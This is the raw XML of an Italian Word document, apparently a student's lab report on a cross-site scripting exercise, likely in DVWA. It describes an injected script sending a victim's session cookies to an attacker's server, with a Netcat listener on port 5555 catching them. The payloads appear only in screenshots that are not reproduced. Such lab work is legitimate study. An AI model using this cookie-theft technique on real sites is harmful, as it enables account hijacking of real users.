            <wp:docPr id="340681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9438c4d49e44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1166D" w:rsidP="5F81166D" w:rsidRDefault="5F81166D" w14:paraId="5BE5D3E1" w14:textId="2C51F22A">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="5F81166D">
        <w:rPr/>
        <w:t xml:space="preserve">E una volta che questo viene eseguito nel browser dell’utente, invia i cookie al server specificato consentendo all’attaccante di impersonare l’utente stesso </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5F81166D" w:rsidP="5F81166D" w:rsidRDefault="5F81166D" w14:paraId="58E3BE27" w14:textId="7D5A17E4">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="5F81166D">
        <w:rPr/>
        <w:t xml:space="preserve">La prova che i cookie sono stati “rubati” dal nostro server in ascolto la abbiamo tramite </w:t>
      </w:r>
      <w:r w:rsidR="5F81166D">
        <w:rPr/>
        <w:t>Netcat</w:t>
      </w:r>
      <w:r w:rsidR="5F81166D">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5F81166D" w:rsidP="5F81166D" w:rsidRDefault="5F81166D" w14:paraId="533333CA" w14:textId="27AA42C3">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline wp14:editId="124670B4" wp14:anchorId="42A943BB">
            <wp:extent cx="5724524" cy="2743200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1932877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4a1181f8bf4f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1166D" w:rsidP="5F81166D" w:rsidRDefault="5F81166D" w14:paraId="5B68737D" w14:textId="209CD99C">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="5F81166D">
        <w:rPr/>
        <w:t>Netcat</w:t>
      </w:r>
      <w:r w:rsidR="5F81166D">
        <w:rPr/>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="5F81166D">
        <w:rPr/>
        <w:t>nc</w:t>
      </w:r>
      <w:r w:rsidR="5F81166D">
        <w:rPr/>
        <w:t>) è un tool che ha molte funzionalità, tra cui impostare un ascoltatore su una porta specifica, nel nostro caso sulla porta 5555.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5F81166D" w:rsidP="5F81166D" w:rsidRDefault="5F81166D" w14:paraId="673F89B4" w14:textId="205525BA">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="5F81166D">
        <w:rPr/>
        <w:t xml:space="preserve">Con </w:t>
      </w:r>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F81166D">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F81166D">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>lvp</w:t>
      </w:r>
      <w:r w:rsidR="5F81166D">
        <w:rPr/>
        <w:t xml:space="preserve"> che sta a significare:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5F81166D" w:rsidP="5F81166D" w:rsidRDefault="5F81166D" w14:paraId="539927F8" w14:textId="1316525F">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F81166D">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>-l:</w:t>
      </w:r>
      <w:r w:rsidR="5F81166D">
        <w:rPr/>
        <w:t xml:space="preserve"> sta dicendo a </w:t>
      </w:r>
      <w:r w:rsidR="5F81166D">
        <w:rPr/>
        <w:t>netcat</w:t>
      </w:r>
      <w:r w:rsidR="5F81166D">
        <w:rPr/>
        <w:t xml:space="preserve"> di mettersi in modalità ascolta </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5F81166D" w:rsidP="5F81166D" w:rsidRDefault="5F81166D" w14:paraId="5B91B2C6" w14:textId="5EB640B7">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F81166D">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">-v: </w:t>
      </w:r>
      <w:r w:rsidR="5F81166D">
        <w:rPr/>
        <w:t xml:space="preserve">sta dicendo di rendere la connessione </w:t>
      </w:r>
      <w:r w:rsidR="5F81166D">
        <w:rPr/>
        <w:t>piu</w:t>
      </w:r>
      <w:r w:rsidR="5F81166D">
        <w:rPr/>
        <w:t xml:space="preserve"> “verbosa” ovvero da fornire </w:t>
      </w:r>
      <w:r w:rsidR="5F81166D">
        <w:rPr/>
        <w:t>più</w:t>
      </w:r>
      <w:r w:rsidR="5F81166D">
        <w:rPr/>
        <w:t xml:space="preserve"> informazioni </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5F81166D" w:rsidP="5F81166D" w:rsidRDefault="5F81166D" w14:paraId="0B167E81" w14:textId="3511D004">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F81166D">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>-p:</w:t>
      </w:r>
      <w:r w:rsidR="5F81166D">
        <w:rPr/>
        <w:t xml:space="preserve"> la porta in </w:t>
      </w:r>
      <w:r w:rsidR="5F81166D">
        <w:rPr/>
        <w:t>ascolto</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5F81166D" w:rsidP="5F81166D" w:rsidRDefault="5F81166D" w14:paraId="5DC92365" w14:textId="061F7C58">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="5F81166D" w:rsidP="5F81166D" w:rsidRDefault="5F81166D" w14:paraId="574B4593" w14:textId="50A66208">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidRPr="5F81166D" w:rsidR="5F81166D">
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>BONUS:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5397E396" w:rsidP="5397E396" w:rsidRDefault="5397E396" w14:paraId="06D2F609" w14:textId="408B2F43">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidRPr="5397E396" w:rsidR="5397E396">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Per quanto riguarda la security MEDIUM, il procedimento è pressoché lo stesso:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5397E396" w:rsidP="5397E396" w:rsidRDefault="5397E396" w14:paraId="213DC7D2" w14:textId="0362EE62">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="5397E396" w:rsidP="5397E396" w:rsidRDefault="5397E396" w14:paraId="3B07509D" w14:textId="6720DC6C">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidRPr="5397E396" w:rsidR="5397E396">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline wp14:editId="0B665C97" wp14:anchorId="2B8D12DE">
            <wp:extent cx="4016088" cy="1196444"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1079746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bded97b58548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7E396" w:rsidP="5397E396" w:rsidRDefault="5397E396" w14:paraId="34376820" w14:textId="531A2FAB">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline wp14:editId="0D101387" wp14:anchorId="73B1652A">
            <wp:extent cx="5724524" cy="1905000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2025001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0bd05ca5084d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7E396" w:rsidP="5397E396" w:rsidRDefault="5397E396" w14:paraId="11C812AD" w14:textId="13628D2A">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline wp14:editId="5DC084CA" wp14:anchorId="0ECEA8A7">
            <wp:extent cx="5724524" cy="2143125"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="296610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415b59507d42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7E396" w:rsidP="5397E396" w:rsidRDefault="5397E396" w14:paraId="58024813" w14:textId="6EBADE79">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="5397E396">
        <w:rPr/>
        <w:t xml:space="preserve">Non riesco ad implementare lo script Java affinché mi dia la data, riesco a trovare l’user agent con la </w:t>
      </w:r>
      <w:r w:rsidR="5397E396">
        <w:rPr/>
        <w:t>versione</w:t>
      </w:r>
      <w:r w:rsidR="5397E396">
        <w:rPr/>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="1271AB07">
        <w:rPr/>
        <w:t>gli indirizzi IP</w:t>
      </w:r>
      <w:r w:rsidR="5397E396">
        <w:rPr/>
        <w:t xml:space="preserve"> e i cookie</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5397E396" w:rsidP="5397E396" w:rsidRDefault="5397E396" w14:paraId="7A50C3FC" w14:textId="001BE98C">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="5397E396">
        <w:rPr/>
        <w:t xml:space="preserve">Mentre per quanto riguarda la versione high per problemi con la versione di </w:t>
      </w:r>
      <w:r w:rsidR="5397E396">
        <w:rPr/>
        <w:t>php</w:t>
      </w:r>
      <w:r w:rsidR="5397E396">
        <w:rPr/>
        <w:t xml:space="preserve"> risulta difficile completare il task.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5397E396" w:rsidP="5397E396" w:rsidRDefault="5397E396" w14:paraId="29BC2977" w14:textId="7ED21CE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A32EA8"/>
    <w:rsid w:val="0D20E89D"/>
    <w:rsid w:val="1271AB07"/>
    <w:rsid w:val="24A32EA8"/>
    <w:rsid w:val="5397E396"/>
    <w:rsid w:val="5F81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2EA8"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{43D929EB-3C23-44D8-8F55-A46A9C33F8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49438c4d49e4402" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image2.png" Id="R694a1181f8bf4f95" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image3.png" Id="Rf6bded97b585480c" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image4.png" Id="R8e0bd05ca5084d8a" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image5.png" Id="R2b415b59507d42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2024-04-15T20:21:49.8618847Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-04-18T07:41:46.5362967Z</dcterms:modified>
  <dc:creator>Andrea Panicucci</dc:creator>
  <lastModifiedBy>Andrea Panicucci</lastModifiedBy>
</coreProperties>
</file>